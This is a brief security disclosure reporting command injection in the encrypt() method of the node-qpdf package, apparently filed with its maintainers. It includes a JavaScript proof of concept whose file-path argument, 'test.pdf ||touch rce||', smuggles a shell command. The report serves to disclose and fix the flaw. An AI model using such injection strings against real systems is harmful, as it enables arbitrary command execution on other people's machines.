We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method encrypt() fails to sanitize its parameter input, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they can specify the input pdf file path.
Here is the proof of concept.
```javascript
var qpdf = require('node-qpdf');
var options = {
  keyLength: 128,
  password: 'YOUR_PASSWORD_TO_ENCRYPT'
};
qpdf.encrypt('test.pdf ||touch rce||', options); // a file named rce will be created
```